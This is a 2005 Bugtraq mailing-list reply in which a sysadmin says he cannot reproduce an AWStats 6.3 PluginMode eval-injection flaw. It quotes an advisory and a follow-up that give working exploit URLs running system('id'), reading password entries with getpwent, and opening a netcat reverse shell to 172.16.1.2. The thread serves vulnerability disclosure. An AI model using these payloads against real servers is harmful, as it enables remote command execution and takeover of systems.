Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?

To: Ondra Holecek <bln@xxxxxxxxxxx>
Subject: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: Jamie Pratt <jpratt@xxxxxxxxxxx>
Date: Tue, 15 Feb 2005 14:25:43 -0500
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <42121439.6020505@xxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Norwich University
References: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx> <42121439.6020505@xxxxxxxxxxx>
Reply-to: jpratt@xxxxxxxxxxx
User-agent: Mozilla Thunderbird 1.0 (Windows/20041206)

So what are the conditions of this bug/vuln? I can't reproduce this onseveral 6.3 installs..:


awstats 6.3 from source:

request:

http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;

output:
****************

Error: Can't locate object method "BuildFullHTMLOutput_print" viapackage "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)line 1.

Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server orpermissions) may be wrong.Check config file, permissions and AWStats documentation (in 'docs'directory).

***************

regards,
jamie

Ondra Holecek wrote:



GHC@xxxxxxxxxxxxxxxxxxxxx wrote:
|
| /*==========================================*/
| // GHC -> AWStats <- ADVISORY
| \\ PRODUCT: AWStats
| // VERSION: <= 6.3
| \\ URL: http://awstats.sourceforge.net/
| // VULNERABILITY CLASS: Multiple vulnerabilities
| \\ RISK: high
| /*==========================================*/

[...]

|
| PluginMode=:print+getpwent
|
| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.

| This will satisfy eval() requirements., and :print getpwent() isexecuted.

|
|

http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent

|
| Sanitazing limits user's input, but there is no filtration for call
sympols '()'.

no, user is not limited, he can execute ANY command if he add ; at the
end of the command, try this

awstats.pl?&PluginMode=:print+system('id')+;

or even this

awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;


Ondra


--

James Pratt
Unix Systems Administrator
Norwich University
http://www.norwich.edu/it
<jpratt@xxxxxxxxxxx> | ph. (802)485-2532

Follow-Ups:
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
  - From: twebster
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
  - From: Ondra Holecek

References:
- AWStats <= 6.4 Multiple vulnerabilities
  - From: GHC
- Re: AWStats <= 6.4 Multiple vulnerabilities
  - From: Ondra Holecek

Prev by Date: Re: International Domain Name [IDN] support in modern browsers allows attackers to spoof domain name URLs + SSL certs.
Next by Date: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
Previous by thread: Re: AWStats <= 6.4 Multiple vulnerabilities
Next by thread: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
Index(es):
- Date
- Thread